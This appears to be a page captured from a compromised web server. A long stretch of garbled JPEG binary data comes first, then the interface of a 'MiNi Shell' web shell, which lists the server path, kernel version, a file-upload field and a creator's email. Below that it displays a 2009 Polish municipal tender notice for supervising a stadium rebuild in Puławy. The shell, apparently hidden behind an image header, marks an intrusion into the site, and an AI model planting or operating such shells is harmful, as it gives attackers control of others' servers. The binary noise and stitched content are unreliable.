JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/161830-N-2009.html

<p class="kh_header"><b>Puławy: Nadzór inwestorski nad zadaniem inwestycyjnym - Przebudowa i rozbudowa stadionu Miejskiego Ośrodka Sportu i Rekreacji w Puławach przy ul. Hauke Bossaka.</b><br>
<b>Numer ogłoszenia: 161830 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Inwestycji Miejskich w Puławach , ul. Piłsudskiego 83, 24-100 Puławy, woj. lubelskie, tel. 081 8804510, faks 081 8804511.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zim.bip.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad zadaniem inwestycyjnym - Przebudowa i rozbudowa stadionu Miejskiego Ośrodka Sportu i Rekreacji w Puławach przy ul. Hauke Bossaka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nadzór inwestorski nad zadaniem inwestycyjnym - Przebudowa i rozbudowa stadionu Miejskiego Ośrodka Sportu i Rekreacji w Puławach przy ul. Hauke Bossaka w specjalnościach: konstrukcyjno - budowlanej, drogowej, telekomunikacyjnej, instalacji sanitarnych, instalacji elektrycznych oraz nadzór nad realizacją zieleni na całym terenie stadionu i wykonaniem nawierzchni z trawy naturalnej na boisku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10.000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności:

	1.Inspektor nadzoru w zakresie robót konstrukcyjno - budowlanych - koordynator inspektorów nadzoru,  posiadający doświadczenie w pełnieniu funkcji inspektora nadzoru lub kierownika budowy przy wykonaniu: 
		- minimum 2 obiektów użyteczności publicznej o powierzchni użytkowej                nie mniejszej niż 2300 m2, gdzie jeden obiekt posiadał konstrukcję                żelbetowo -  stalową zaś drugi był obiektem wielokondygnacyjnym                wybudowanym w    technologii tradycyjnej,
	               oraz 
		- minimum jednego obiektu typu boisko z elementami lekkiej atletyki z                           podbudową.
           
	2. Inspektor w zakresie robót sanitarnych, posiadający doświadczenie w pełnieniu                 funkcji inspektora nadzoru lub kierownika robót przy wykonaniu:
		- minimum 2 obiektów użyteczności publicznej o powierzchni użytkowej                nie mniejszej niż 1000 m2 wyposażonych w instalacje: wentylacji i                klimatyzacji,  wod. - kan., c. o.,
	               oraz
		- minimum 2 budów wyposażonych w sieci zewnętrzne:  c. o., wod. - kan. 
              i kanalizacji deszczowej.
	
	3.  Inspektor w zakresie robót elektrycznych, posiadający doświadczenie                  w  pełnieniu funkcji inspektora nadzoru lub kierownika robót przy wykonaniu:
		- minimum jednego obiektu użyteczności publicznej o powierzchni                 użytkowej nie   mniejszej niż 1000 m2, wyposażonego w instalacje:                 elektryczną, siłową, telefoniczną, odgromową, przeciwpożarową oraz                 instalację 24V prądu   przemiennego,
	                oraz
		- minimum jednego obiektu typu stacja trafo,
		- minimum dwóch linii kablowych SN i NN.

	4. Inspektor nadzoru w zakresie robót drogowych, posiadający doświadczenie                 w pełnieniu funkcji inspektora nadzoru lub kierownika robót przy wykonaniu:
			- minimum dwóch obiektów typu: droga, parking, ciąg pieszo -                            jezdny lub  chodniki o nawierzchni z kostki betonowej z                            podbudową,
	                           oraz
			- minimum jednego obiektu typu boisko z elementami lekkiej                                        atletyki z podbudową.

	5. Inspektor nadzoru w zakresie robót telekomunikacyjnych, posiadający                  doświadczenie w pełnieniu funkcji inspektora nadzoru lub kierownika robót                  przy wykonaniu:
		- minimum jednego obiektu użyteczności publicznej o powierzchni                 użytkowej nie   mniejszej niż 1000 m2, wyposażonego w instalacje                 wewnętrzne: komputerową,   telewizyjną i alarmową
	                oraz
		-   minimum dwóch linii kablowych światłowodowych.

	6. Inspektor nad wykonaniem nawierzchni z trawy naturalnej na boisku i nad                 realizację zieleni na całym terenie stadionu, posiadający doświadczenie w                 pełnieniu funkcji inspektora przy realizacji lub nadzorze minimum dwóch                 obiektów typu skwer, boisko, itp. z urządzeniem zieleni. 



3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)	spełnią pozostałe wymagania SIWZ.

Ocena spełniania warunków udziału w postępowaniu będzie dokonywana poprzez analizę oświadczeń lub dokumentów, o których mowa w pkt. VI.  na zasadzie spełnia/ nie spełnia wymaganego warunku..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności
   lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, Zamawiający żąda 
   następujących oświadczeń i dokumentów: 
1)	oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Pzp,
2)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,  
3)	aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
            Uwaga !   
W przypadku Wykonawców wspólnie ubiegających się o udzielenie 
            Zamówienia ( Konsorcjum ): 
      	  - dokumenty wymienione w pkt. 2 - 6 winny być przedłożone przez 
                każdego  Wykonawcę,
              - oświadczenie wymienione w pkt. 1 winno być przedłożone wspólnie w 
                imieniu wszystkich Wykonawców ( jeżeli będzie je składał                 pełnomocnik, wówczas pełnomocnictwo musi obejmować nie tylko                 upoważnienie do występowania w imieniu wszystkich Wykonawców                                           wspólnie ubiegających się o uzyskanie zamówienia, ale także                 upoważnienie do występowania w  imieniu każdego z Wykonawców  z osobna )                  albo przez każdego Wykonawcę odrębnie. 
                W tej drugiej sytuacji Zamawiający będzie uważał,  że każdy z                 Wykonawców złożył oświadczenie dotyczące tej części warunku, za                 której spełnienie jest odpowiedzialny.



2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę 
   niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami 
   zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:

1) wykazu wykonanych usług ( Załącznik - Wykaz usług ) w okresie ostatnich 3 lat przed dniem      wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest      krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym      przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, tj.: 

        1.Inspektor  nadzoru w zakresie robót konstrukcyjno - budowlanych - koordynator inspektorów nadzoru przy wykonaniu: 
		- minimum 2 obiektów użyteczności publicznej o powierzchni użytkowej                nie mniejszej niż 2300 m2, gdzie jeden obiekt posiadał konstrukcję                żelbetowo -  stalową zaś drugi był obiektem wielokondygnacyjnym                wybudowanym w    technologii tradycyjnej,
	               oraz 
		- minimum jednego obiektu typu boisko z elementami lekkiej atletyki z                           podbudową.

	  	 Uwaga !  Usługę nadzoru nad realizacją boiska z elementami lekkiej atletyki z                                            podbudową  może  wykazać inspektor nadzoru w zakresie robót drogowych.

	2. Inspektor w zakresie robót sanitarnych przy wykonaniu:
		- minimum 2 obiektów użyteczności publicznej o powierzchni użytkowej                nie mniejszej niż 1000 m2 wyposażonych w instalacje: wentylacji i                klimatyzacji,  wod. - kan., c. o.,
	               oraz
		- minimum 2 budów wyposażonych w sieci zewnętrzne:  c. o., wod. - kan. 
              i kanalizacji deszczowej.
	
	3.  Inspektor w zakresie robót elektrycznych przy wykonaniu:
		- minimum jednego obiektu użyteczności publicznej o powierzchni                 użytkowej nie   mniejszej niż 1000 m2, wyposażonego w instalacje:                 elektryczną, siłową,   telefoniczną, odgromową, przeciwpożarową oraz                 instalację 24V prądu   przemiennego,
	                oraz
		-   minimum jednego obiektu typu stacja trafo,
		-   minimum dwóch linii kablowych SN i NN.

	4. Inspektor nadzoru w zakresie robót drogowych przy wykonaniu:
		- minimum dwóch obiektów typu: droga, parking, ciąg pieszo -                  jezdny lub  chodniki o nawierzchni z kostki betonowej z                  podbudową,
	                 oraz
		- minimum jednego obiektu typu boisko z elementami lekkiej                             atletyki z podbudową.

		Uwaga ! Usługę nadzoru nad realizacją boiska z elementami lekkiej atletyki z podbudową                           może wykazać inspektor nadzoru w zakresie robót konstrukcyjno - budowlanych.

	5. Inspektor nadzoru w zakresie robót telekomunikacyjnych  przy wykonaniu:
		- minimum jednego obiektu użyteczności publicznej o powierzchni                 użytkowej nie   mniejszej niż 1000 m2, wyposażonego w instalacje                 wewnętrzne: komputerową,   telewizyjną i alarmową
	                oraz
		-   minimum dwóch linii kablowych światłowodowych.

	6. Inspektor nad wykonaniem nawierzchni z trawy naturalnej na boisku i nad                 realizację zieleni na całym terenie stadionu przy realizacji lub nadzorze                 minimum dwóch obiektów typu skwer, boisko, itp. z urządzeniem zieleni. 

	Uwaga !  Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te                   zostały wykonane należycie.

2) wykazu osób ( Załącznik - Wykaz osób ), którymi dysponuje lub będzie dysponował Wykonawca i     które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji     zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także     zakresu wykonywanych przez nie czynności. 

    Zamawiający wymaga wskazania przez Wykonawcę:

          - inspektora nadzoru w zakresie robót konstrukcyjno - budowlanych -                     koordynatora   inspektorów nadzoru posiadającego uprawnienia budowlane do               kierowania   robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez               ograniczeń ( lub   innej odpowiadającej dzisiejszym uprawnieniom w tej specjalności ).
	  ( kserokopie w załączeniu)

- inspektora nadzoru w zakresie robót sanitarnych posiadającego uprawnienia     budowlane do kierowania  robotami budowlanymi  w specjalności instalacyjnej w zakresie     sieci, instalacji i urządzeń sanitarnych -  cieplnych, wentylacyjnych, wodociągowych 
    i kanalizacyjnych. (kserokopie w załączeniu).

- inspektora nadzoru  w zakresie robót elektrycznych  posiadającego uprawnienia       budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie    sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, (kserokopie w załączeniu).

- inspektora nadzoru w zakresie  robót drogowych posiadającego uprawnienia        budowlane do kierowania robotami budowlanymi w specjalności drogowej. (kserokopie 
   w załączeniu). 

            - inspektora nadzoru w zakresie robót telekomunikacyjnych posiadającego 
              uprawnienia budowlane do kierowania robotami budowlanymi w specjalności               telekomunikacji przewodowej wraz z  infrastrukturą telekomunikacyjną oraz               telekomunikacji radiowej wraz z infrastrukturą towarzyszącą. (kserokopie w załączeniu).

            - inspektora nad wykonaniem nawierzchni z trawy naturalnej na boisku i nad                realizacją zieleni legitymującego się dyplomem zawodowym.

Wyżej wymienieni inspektorzy winni być członkami właściwej Izby Samorządu Zawodowego Inżynierów Budownictwa i  posiadać aktualne zaświadczenie o wpisie na listę członków właściwej izby.(kserokopia w załączeniu)

Uwaga !   -  Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów 
                    do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w 
                    wykazie Wykonawca wskazał osoby, którymi będzie dysponował.
                             -  W przypadku Wykonawców wspólnie ubiegających się o udzielenie 
                                Zamówienia  ( Konsorcjum )dokumenty wymienione w pkt. 1-2 winny                                                   być przedłożone przez Wykonawców łącznie.

3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej 
   stosuje się odpowiednio przepisy  § 2.1. Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja    2006 - w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz    form, w jakich  te dokumenty mogą być składane ( Dz. U. Nr 87, poz.605 z późn. zm. )

VII.WYKAZ DODATKOWYCH DOKUMENTÓW DO OFERTY.
1.	Dowód wniesienia wadium.
2.	Od wykonawców występujących wspólnie - pełnomocnictwo do reprezentowania ich w postępowaniu.

Uwaga ! 
Dokumenty, o których mowa wyżej, za wyjątkiem pełnomocnictwa, należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Kserokopie dokumentów muszą być ponadto opatrzone własnoręcznym podpisem osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy.  Jeżeli z dokumentów określających status prawny Wykonawcy lub pełnomocnictwa wynika, iż do reprezentowania Wykonawcy upoważnionych jest łącznie kilka osób, dokumenty wchodzące w skład oferty muszą być podpisane przez wszystkie te osoby.
Pełnomocnictwo należy złożyć w formie oryginału bądź kopii poświadczonej notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zim.bip.pulawy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Inwestycji Miejskich w Puławach,
ul. Piłsudskiego 83, pokój Nr 20,
24 - 100 Puławy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 09:00, miejsce: Zarząd Inwestycji Miejskich w Puławach,
ul. Piłsudskiego 83, pokój Nr 14 - sekretariat,
24 - 100 Puławy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com